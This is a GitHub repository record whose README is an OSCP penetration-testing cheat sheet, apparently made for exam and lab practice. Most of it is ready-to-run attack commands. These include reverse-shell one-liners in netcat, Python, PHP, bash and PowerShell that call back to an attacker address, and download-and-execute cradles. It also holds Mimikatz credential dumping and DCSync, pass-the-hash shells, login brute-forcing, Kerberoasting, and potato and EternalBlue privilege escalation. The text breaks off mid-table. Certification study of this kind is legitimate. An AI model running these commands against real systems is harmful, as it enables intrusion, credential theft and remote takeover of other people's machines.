{"id":16471131,"url":"https://github.com/rizemon/oscp-pwk-notes","last_synced_at":"2025-03-23T11:32:43.287Z","repository":{"id":50227084,"uuid":"326436743","full_name":"rizemon/OSCP-PWK-Notes","owner":"rizemon","description":"OSCP notes","archived":false,"fork":false,"pushed_at":"2021-05-01T09:34:18.000Z","size":833,"stargazers_count":51,"open_issues_count":0,"forks_count":22,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-18T20:05:17.544Z","etag":null,"topics":["oscp"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rizemon.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-03T15:20:22.000Z","updated_at":"2025-02-10T22:20:58.000Z","dependencies_parsed_at":"2022-09-24T09:01:17.315Z","dependency_job_id":null,"html_url":"https://github.com/rizemon/OSCP-PWK-Notes","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rizemon%2FOSCP-PWK-Notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rizemon","download_url":"https://codeload.github.com/rizemon/OSCP-PWK-Notes/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245097158,"owners_count":20560311,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["oscp"],"created_at":"2024-10-11T12:12:43.166Z","updated_at":"2025-03-23T11:32:42.801Z","avatar_url":"https://github.com/rizemon.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# OSCP-PWK-Notes\r\n\r\n## Exam Proofs\r\n\r\nLinux:\r\n\r\n```bash\r\nhostname\r\ncat /path/to/flag/proof.txt\r\nifconfig\r\n```\r\n\r\nWindows:\r\n\r\n```bash\r\nhostname\r\ntype C:\\path\\to\\flag\\proof.txt\r\nipconfig\r\n```\r\n\r\n\r\n## Useful services\r\n\r\n### SSHd\r\n\r\n```bash\r\nsudo systemctl start ssh\r\nsudo systemctl stop ssh\r\n```\r\n\r\nAdd this line to `/etc/ssh/ssh_config` or `/etc/ssh/sshd_config` if you are dealing with old versions of `ssh`. Running `ssh` with the `-v` option will help debug what key exchange algorithms you need.\r\n```\r\nKexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\r\n```\r\n\r\n### Apache2\r\n\r\n```bash\r\n\r\nsudo systemctl start apache2\r\nsudo systemctl stop apache2\r\n```\r\n\r\nDefault root directory is `/var/www/html`.\r\n\r\n## Scanning\r\n\r\nUsing `rustscan`: \r\n```bash\r\nrustscan --accessible -a \u003ctarget\u003e -r 1-65535 -- -sT -sV -sC -Pn\r\n```\r\n\r\nUsing `nmap`: \r\n```bash\r\nnmap -Pn -sT -sV -sC \u003ctarget\u003e\r\n```\r\n\r\nRemember to perform a `UDP` scan and hopefully there is something you can use!\r\n\r\n```bash\r\nnmap -sU --script tftp-enum -p53,69,161 \u003ctarget\u003e\r\n```\r\n\r\nUsing `nmapAutomator`:\r\n```bash\r\n./nmapAutomator.sh 10.10.10.209 All\r\n```\r\n\r\n\r\n## File Transfers\r\n\r\n### HTTP\r\n\r\nTo start a `HTTP` server:\r\n```bash\r\nsudo python3 -m http.server 80\r\nsudo python2 -m SimpleHTTPServer 80\r\nsudo updog -p 80\r\n```\r\n\r\nTo download a file:\r\n```bash\r\nOn Linux\r\ncurl http://10.0.0.1:80/nc.exe \u003e nc.exe\r\nwget http://10.0.0.1:80/nc.exe -O nc.exe\r\n\r\nOn Windows:\r\ncertutil -f -split -urlcache http://10.0.0.1:80/nc.exe nc.exe\r\npowershell -c \"(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.1:80/nc.exe', 'C:\\Users\\root\\Desktop\\nc.exe')\"\r\npowershell -c \"Invoke-WebRequest http://10.0.0.1:80/nc.exe -OutFile C:\\Users\\root\\Desktop\\nc.exe\"\r\n```\r\n\r\n### SMB\r\n\r\nTo start a `SMB` server:\r\n```bash\r\nOn Linux:\r\nsudo smbserver.py -port 445 -smb2support share . #SMB2\r\nsudo smbserver.py -port 445 share . #SMB1\r\n```\r\n\r\nTo download a file:\r\n\r\n```bash\r\nOn Windows:\r\ncopy \\\\10.0.0.1\\share\\nc.exe C:\\nc.exe\r\n\\\\10.0.0.1\\share\\whoami.exe\r\n```\r\n\r\n### FTP\r\n\r\nTo start a `FTP` server:\r\n```bash\r\nOn Linux:\r\nsudo python3 -m pyftpdlib -p 21 -w\r\n```\r\n\r\nTo download a file:\r\n```bash\r\nOn Windows:\r\nftp -A 10.0.0.1\r\nftp\u003e binary\r\nftp\u003e passive\r\n```\r\n\r\n### TFTP\r\n\r\nTo start a `TFTP` server: \r\n```bash\r\nOn Linux:\r\nsudo atftpd --daemon --port 69 /tftp\r\n```\r\n\r\nTo download a file: \r\n```bash\r\nOn Windows\r\ntftp -i 10.0.0.1 GET nc.exe\r\n```\r\n\r\n### nc\r\n\r\nLinux \u0026rarr; Windows\r\n```bash\r\nOn Linux:\r\ncat nc.exe | nc -lvnp 1337\r\n\r\nOn Windows\r\nnc 10.0.0.1 1337 \u003e nc.exe\r\n```\r\n\r\nWindows \u0026rarr; Linux\r\n```bash\r\nOn Linux:\r\nnc 10.0.0.1 1337 \u003c nc.exe\r\n\r\nOn Windows\r\nnc -lvnp 1337 \u003e nc.exe\r\n```\r\n\r\n## Reverse Shell\r\n\r\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\r\n\r\n### Listener\r\n```bash\r\nrlwrap nc -lvnp 1337\r\n```\r\n\r\n### Netcat/nc Traditional\r\n\r\n```bash\r\nnc -e /bin/sh 10.0.0.1 1337\r\nnc -e /bin/bash 10.0.0.1 1337\r\nnc -c /bin/bash 10.0.0.1 1337\r\n```\r\n\r\n### Netcat/nc OpenBSD\r\n\r\n```bash\r\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 10.0.0.1 1337 \u003e/tmp/f\r\n```\r\n\r\n### Python\r\n\r\nLinux:\r\n```bash\r\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.connect((\"10.0.0.1\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\r\n```\r\n\r\nWindows:\r\n```bash\r\nC:\\Python27\\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 1337)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\\\windows\\\\system32\\\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) \u003e 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"\r\n```\r\n\r\n### PHP\r\n```bash\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);shell_exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);`/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263`;'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);system(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);passthru(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);popen(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\", \"r\");'\r\nphp -r '$sock=fsockopen(\"10.0.0.1\",1337);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e$sock, 2=\u003e$sock),$pipes);'\r\n```\r\n\r\n### Bash TCP\r\n\r\n```bash\r\nbash -i \u003e\u0026 /dev/tcp/10.0.0.1/1337 0\u003e\u00261\r\n```\r\n\r\n### Powershell\r\n\r\n```bash\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 1337\r\n```\r\n\r\n## Powershell version\r\n\r\n```powershell\r\n64-bit: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n32-bit: C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe\r\nC:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe \r\n```\r\n\r\nTo check 32-bit/64-bit:\r\n```powershell\r\n[Environment]::Is64BitProcess\r\n```\r\n\r\n## Upgrade to Full TTY\r\n\r\nSome commands/exploits may only work when you have full TTY.\r\n\r\n### Socat\r\n\r\nAttacker:\r\n```bash\r\nsocat file:`tty`,raw,echo=0 TCP-L:1337\r\n```\r\n\r\nVictim:\r\n```bash\r\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1337\r\n```\r\n\r\n### From nc\r\n\r\nVictim:\r\n```bash\r\npython -c 'import pty;pty.spawn(\"/bin/bash\")'\r\nCtrl-z\r\n```\r\n\r\nAttacker:\r\n```bash\r\necho $TERM # note down\r\nstty -a # note down rows and cols\r\nstty raw -echo\r\nfg\r\n```\r\n\r\nVictim:\r\n```bash\r\nreset\r\nexport SHELL=bash \r\nexport TERM=xterm256-color # from \"echo $TERM\"\r\nstty rows 38 columns 116 # from \"stty -a\"\r\n```\r\n\r\n## Port Enumeration\r\n\r\n### Port 21 (FTP)\r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e ftp \r\n```\r\n\r\n### Port 139/445 (SMB)\r\n\r\nChecking for vulnerabilties:\r\n```bash\r\nnmap -Pn -p445 --script smb-vuln-* \u003ctarget\u003e\r\nnmap -Pn -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version \u003ctarget\u003e # SambaCry\r\n```\r\n\r\nShare enumeration:\r\n```bash\r\nnmap -Pn -p445 --script smb-enum-shares.nse \u003ctarget\u003e # May show path\r\n\r\nsmbmap -H \u003cIP\u003e [-P \u003cPORT\u003e] # Null user\r\nsmbmap -u \"username\" -p \"password\" -H \u003cIP\u003e [-P \u003cPORT\u003e] # Creds\r\nsmbmap -u \"username\" -p \"\u003cLM\u003e:\u003cNT\u003e\" -H \u003cIP\u003e [-P \u003cPORT\u003e] # Pass-the-Hash\r\n\r\nenum4linux -a -u \"\u003cusername\u003e\" -p \"\u003cpassword\u003e\" \u003cIP\u003e\r\n```\r\n\r\nIf there is no null user, remember to try with the guest username.\r\n\r\nAccessing share:\r\n```bash\r\nsmbclient --no-pass -L //\u003cIP\u003e # Null user\r\nsmbclient -U 'username[%passwd]' -L [--pw-nt-hash] //\u003cIP\u003e # If you omit the passwd, it will be prompted. With --pw-nt-hash, the passwd provided is the NT hash\r\n```\r\n\r\nIf there is SMB version incompatibility, edit `/etc/samba/smb.conf` and append `min protocol = SMB1` to `[global]` seciton. \r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e smb \r\n```\r\n\r\nGetting a shell:\r\n\r\nUsing `psexec.py`:\r\n```bash\r\npsexec.py -hashes \"\u003cLM\u003e:\u003cNT\u003e\" Administrator@10.0.0.1\r\npsexec.py Administrator:\u003cpassword\u003e@10.0.0.1\r\npsexec.py \u003cdomain\u003e/Administrator:\u003cpassword\u003e@10.0.0.1\r\n```\r\n\r\nUsing `winexe`:\r\n```bash\r\nwinexe -U Administrator%\u003cpassword\u003e //10.0.0.1 cmd.exe\r\n```\r\n\r\nUsing `pth-winexe`:\r\n```bash\r\npth-winexe -U Administrator%\u003cLM\u003e:\u003cNT\u003e //10.0.0.1 cmd.exe\r\n```\r\n\r\n`aad3b435b51404eeaad3b435b51404ee` is blank LM hash.\r\n\r\n### Port 389 (LDAP)\r\n\r\nGetting LDAP information:\r\n\r\n```bash\r\nldapsearch -h \u003ctarget\u003e -p 389 -x -b \"dc=htb,dc=local\" \r\npython windapsearch.py -d htb.local -U --dc-ip \u003ctarget\u003e\r\n```\r\n\r\n### Port 80 (HTTP)/ 443 (HTTPS)\r\n\r\nWeb server scanning:\r\n```bash\r\nnikto -host http://target:80\r\n```\r\n\r\n\r\n\r\nDirectory brute-forcing:\r\n\r\nIf there is a `/cgi-bin/` folder, try: `.cgi,.pl,.py`\r\n\r\n\r\n```bash\r\ngobuster dir -k -u \"http://target:80/\" -w /usr/share/wordlists/dirb/common.txt -t 100 -x .html,.txt,.xml,.jsp,.php,.asp\r\n\r\nWordlists:\r\n1) /usr/share/wordlists/dirb/big.txt\r\n2) /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt\r\n```\r\n\r\nWordlist creation:\r\n```bash\r\ncewl -e -a http://target:80/ -w wordlist.txt\r\n```\r\n\r\nForm bruteforce:\r\n\r\nUsing `hydra`:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e http-post-form \"/otrs/index.pl:Action=Login\u0026RequestedURL=\u0026Lang=en\u0026TimeOffset=300\u0026User=^USER^\u0026Password=^PASS^:Login Failed\"\r\n```\r\n\r\nUsing `ffuf`:\r\n```bash\r\nffuf -w /usr/share/wordlists/rockyou.txt -u http://nineveh.htb/department/login.php -X POST -d \"username=admin\u0026password=FUZZ\" -fr \"Invalid Password\" -H \"Content-Type: application/x-www-form-urlencoded\" -t 100 \r\n```\r\n\r\nTesting for shellshock:\r\n\r\n```bash\r\nnmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls \u003ctarget\u003e\r\n```\r\n\r\nTesting for heartbleed:\r\n\r\n```bash\r\nnmap -p 443 --script ssl-heartbleed \u003ctarget\u003e\r\n```\r\n\r\n### Port 3306 (MySQL)\r\n\r\nLogin bruteforce:\r\n```bash\r\nhydra -L usernames.txt -P passwords.txt \u003ctarget\u003e mysql\r\n```\r\n\r\nAccessing:\r\n```bash\r\nmysql -h \u003ctarget\u003e -uroot -ptoor\r\n```\r\n\r\n### Port 5985 (WinRM)\r\n\r\nGetting a shell:\r\n```bash\r\nevil-winrm -i \u003ctarget\u003e -u \u003cusername\u003e -p \u003cpassword\u003e\r\nevil-winrm -i \u003ctarget\u003e -u \u003cusername\u003e -H \u003cNT hash\u003e\r\n```\r\n\r\nLogin bruteforce:\r\n```bash \r\ngit clone https://github.com/mchoji/winrm-brute\r\ncd winrm-brute\r\nbundle config path vendor/bundle\r\nbundle install\r\nbundle exec ./winrm-brute.rb -U users.txt -P passwords.txt 10.0.0.1\r\n```\r\n\r\n### Port 1433 (MSSQL)\r\n\r\nAccessing:\r\n```bash\r\nsqsh -S \u003ctarget\u003e:1433 -U sa\r\n```\r\n\r\n## Privilege Escalation\r\n\r\n### [Windows](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)\r\n\r\n#### [winPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)\r\n\r\n```bash\r\nwinPEASany.exe\r\nwinPEAS.bat\r\n```\r\n\r\n#### [Seatbelt](https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Seatbelt.exe)\r\n\r\n```bash\r\nSeatbelt.exe -group=system\r\nSeatbelt.exe -group=user\r\nSeatbelt.exe -group=misc\r\nSeatbelt.exe -group=all -full\r\n```\r\n\r\n#### [Sherlock](https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1)\r\n\r\n```bash\r\nImport-Module .\\Sherlock.ps1; Find-AllVulns\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Sherlock.ps1'); Find-AllVulns\r\n```\r\n\r\n#### [Powerless](https://github.com/M4ximuss/Powerless/blob/master/Powerless.bat)\r\n\r\n```bash\r\nPowerless.bat\r\n```\r\n\r\n#### [Mimikatz](https://github.com/gentilkiwi/mimikatz)\r\n\r\n```bash\r\nmimikatz.exe\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::sam exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::secrets exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::cache exit\"\r\nmimikatz.exe \"privilege::debug token::elevate sekurlsa::logonpasswords exit\"\r\nmimikatz.exe \"privilege::debug token::elevate vault::cred /patch exit\"\r\nmimikatz.exe \"privilege::debug token::elevate lsadump::dcsync /user:domain\\krbtgt /domain:lab.local exit\"\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\r\n```\r\n\r\n#### [Kerberoast](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1)\r\n\r\n```bash\r\nImport-Module .\\Invoke-Kerberoast.ps1; Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat\r\npowershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat\r\n```\r\n\r\n#### [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)\r\n\r\n```bash\r\nwindows-exploit-suggester.py --update\r\nsysteminfo \u003e systeminfo.txt\r\nwindows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt \r\n```\r\n\r\n#### [Windows Exploit Suggester NG](https://github.com/bitsadmin/wesng)\r\n\r\n```bash\r\nwes.py --update\r\nsysteminfo \u003e systeminfo.txt\r\nwes.py systeminfo.txt\r\n```\r\n\r\n### [Linux](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)\r\n\r\n#### [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)\r\n\r\n```bash\r\n./lse.sh -l 1 -i\r\n```\r\n\r\n#### [LinEnum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)\r\n\r\n```bash\r\n./LinEnum.sh\r\n```\r\n\r\n#### [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh)\r\n\r\n```bash\r\n./linpeas.sh\r\n```\r\n\r\n#### [SUDO_Killer](https://github.com/TH3xACE/SUDO_KILLER)\r\n\r\n```bash\r\n./extract.sh\r\n./sudo_killer.sh -c -i /path/sk_offline.txt\r\n```\r\n\r\n#### [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh)\r\n\r\n```bash\r\n./linux-exploit-suggester.sh -k 3.2.0\r\n```\r\n\r\n#### [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl)\r\n\r\n```bash\r\n./linux-exploit-suggester.pl -k 3.2.0\r\n```\r\n\r\n## Port-Forwarding\r\n\r\n### Local SSH Forwarding\r\n\r\nIf a service is only exposed on a host in another network and you want to make it accessible on a local port,\r\n\r\n```bash\r\nssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER\r\n```\r\n\r\n### Remote SSH Forwarding\r\n\r\nIf a service is only exposed on a host in another network and you want to make it accessible on a local port,\r\n\r\nUsing `ssh`:\r\n```bash\r\nssh -R 3306:127.0.0.1:3306 user@SSH_SERVER\r\n```\r\n\r\nUsing `plink.exe`:\r\n```bash\r\nplink.exe -l root -pw root 10.10.XX.XX -R 445:127.0.0.1:445 -P 2222\r\n```\r\n\r\n## Compiling Exploits\r\n\r\n```bash\r\ngcc -pthread dirty.c -o dirty -lcrypt # Dirty Cow\r\ni686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32 # 'afs.sys' \r\ngcc -m32 -Wl,--hash-style=both 9542.c -o 9542 # 'ip_append_data()\r\n```\r\n\r\n## Useful tools\r\n\r\n### `JuicyPotato`:\r\n\r\nRequires `SeAssignPrimaryTokenPrivilege` and `SeImpersonatePrivilege`\r\n\r\n```bash\r\njuicypotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c C:\\reverse.exe\" -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}\r\n```\r\n\r\nGet `CLSID` from [here](https://ohpe.it/juicy-potato/CLSID/)\r\n\r\n### `RoguePotato`:\r\n\r\nRequires `SeAssignPrimaryTokenPrivilege` and `SeImpersonatePrivilege`\r\n\r\nFor Windows Server 2019 and Windows 10.\r\n\r\nSet up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:\r\n```bash\r\n$ sudo socat tcp-listen:135,reuseaddr,fork tcp:\u003ctarget\u003e:9999\r\n```\r\n\r\nRun the `RoguePotato` exploit:\r\n\r\n```bash\r\nRoguePotato.exe -r \u003cattacker\u003e -e \"C:\\PrivEsc\\reverse.exe\" -l 9999\r\n```\r\n\r\n### `PrintSpoofer`:\r\n\r\nRequires `SeImpersonatePrivilege`\r\n\r\nWindows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2019\r\n\r\n```bash\r\nPrintSpoofer.exe -c \"C:\\PrivEsc\\reverse.exe\" -i\r\n```\r\n\r\n### `EternalBlue`:\r\n\r\n```bash\r\npython eternalblue/checker.py legacy.htb\r\npython eternalblue/send_and_execute.py legacy.htb reverse.exe 445 \u003cpipe\u003e\r\n```\r\n\r\n### `MSFVenom`:\r\n\r\n\r\n## Static Binaries\r\n\r\nhttps://github.com/ernw/static-toolbox\r\n\r\nhttps://github.com/ZephrFish/static-tools\r\n\r\nhttps://github.com/andrew-d/static-binaries\r\n\r\nhttps://github.com/interference-security/kali-windows-binaries\r\n\r\nhttps://github.com/r3motecontrol/Ghostpack-CompiledBinaries\r\n\r\n## Compiled Exploits\r\n\r\nhttps://github.com/SecWiki/windows-kernel-exploits\r\n\r\nhttps://github.com/SecWiki/linux-kernel-exploits\r\n\r\nhttps://github.com/abatchy17/WindowsExploits\r\n\r\n## Useful Exploits\r\n\r\n[Windows XP SP0/SP1 Privilege Escalation to System](https://sohvaxus.github.io/content/winxp-sp1-privesc.html)\r\n\r\n[Bypassing default UAC settings manually](https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/)\r\n\r\n[MS17-010/Eternal Blue](https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py)\r\n\r\n[Ghostcat](https://github.com/dacade/CVE-2020-1938)\r\n\r\n[SMTP Shellshock](https://gist.github.com/claudijd/33771b6c17bc2e4bc59c)\r\n\r\n[SambaCry](https://github.com/joxeankoret/CVE-2017-7494)\r\n\r\n[Samba Symlink Traversal](https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually)\r\n\r\n## References\r\n\r\nhttps://github.com/tbowman01/OSCP-PWK-Notes-Public\r\n\r\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\r\n\r\nhttps://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic\r\n\r\nhttps://book.hacktricks.xyz/\r\n\r\nhttps://github.com/frizb/Hydra-Cheatsheet\r\n\r\n## Tools list (`install.sh`)\r\n\r\n### General\r\n\r\n| Toolname | Location | Installed |\r\n| ----------------- | ------------------------------ | ---------- |\r\n| `docker-ce` | - | Yes |\r\n| `rlwrap` | - | Yes |\r\n| `code` | - | Yes |\r\n| `openjdk-11-jdk` | - | Yes |\r\n| `gdb` | - | Yes |\r\n| `pip2` | - | Yes |\r\n| `pip3` | - | Yes |\r\n| `updog` | - | Yes |\r\n| `volatility` | `~/Desktop/tools/volatility3` | Yes |\r\n| `ghidra` | `~/Desktop/tools/ghidra` | Yes |\r\n| `sysinternals` | `~/Desktop/tools/sysinternals` | Yes |\r\n| `pwntools` | - | Yes |\r\n| `z3-solver` | - | Yes |\r\n| `randcrack` | - | Yes |\r\n\r\n### Shell\r\n\r\n| Toolname | Location | Installed |\r\n| ---------------- | --------------------------- | ---------- |\r\n| `rlwrap` | - | Yes |\r\n| `telnet` | - | Yes |\r\n| `evil-winrm` | - | Yes |\r\n| `msfpc` | `~/Desktop/tools/msfpc` | Yes |\r\n| `rsg` | `~/Desktop/tools/rsg` | Yes |\r\n\r\n\r\n### Web\r\n\r\n| Toolname | Location | Installed |\r\n| ---------------- | -------------------------- | ---------- |\r\n| `gobuster` | - | Yes |\r\n| `ffuf` | - | Yes |\r\n| `seclists` | `~/Desktop/tools/seclists` | Yes |\r\n| `mariadb-client` | - | Yes |\r\n| `feroxbuster` | - | Yes |\r\n\r\n### Compilation \r\n\r\n| Toolname | Location | Installed |\r\n| ---------------- | -------------------------- | ---------- |\r\n| `cmake` | - | Yes |\r\n| `mingw-w64` | - | Yes |\r\n\r\n\r\n### Brute-force\r\n\r\n| Toolname | Location | Installed |\r\n| ----------------- | -------------------------- | ---------- |\r\n| `crowbar` | - | Yes |\r\n\r\n\r\n### Recon\r\n\r\n| Toolname | Location | Installed |\r\n| ----------------- | -------------------------- | ---------- |\r\n| `rustscan` | - | Yes |\r\n| `AutoRecon` | - | Yes |\r\n| `nmapAutomator` | - | Yes |\r\n\r\n### Windows Enumeration\r\n\r\n| Toolname | Location | Installed |\r\n| ----------------- | ------------------------------------------- | ---------- |\r\n| `Sherlock` | `~/Desktop/web/sherlock.ps1` | Yes |\r\n| `Empire` | `~/Desktop/tools/Empire` | Yes |\r\n| `wesng` | `~/Desktop/tools/wesng` | Yes |\r\n| `Windows-Exploit-Suggester` | `~/Desktop/tools/Windows-Exploit-Suggester` | Yes |\r\n| `Powerless` | `~/Desktop/web/powerless.bat` | Yes |\r\n| `Seatbelt` | `~/Desktop/web/seatbelt.exe` | Yes |\r\n| `Powerview` | `~/Desktop/web/powerview.ps1` | Yes |\r\n| `winPEAS` | `~/Desktop/web/winpeasany.exe` | Yes |\r\n| `nishang` | `~/Desktop/tools/nishang` | Yes |\r\n| `juicypotato x64` | `~/Desktop/web/juicypotato.exe` | Yes |\r\n| `roguepotato` | `~/Desktop/web/roguepotato.exe` | Yes |\r\n\r\n\r\n### Linux Enumeration\r\n\r\n| Toolname | Location | Installed |\r\n| ------------------------- | ----------------------------------------- | ---------- |\r\n| `sudo_killer` | `~/Desktop/tools/SUDO_KILLER` | Yes |\r\n| `linux-exploit-suggester` | `~/Desktop/tools/linux-exploit-suggester` | Yes |\r\n| `LinEnum.sh` | 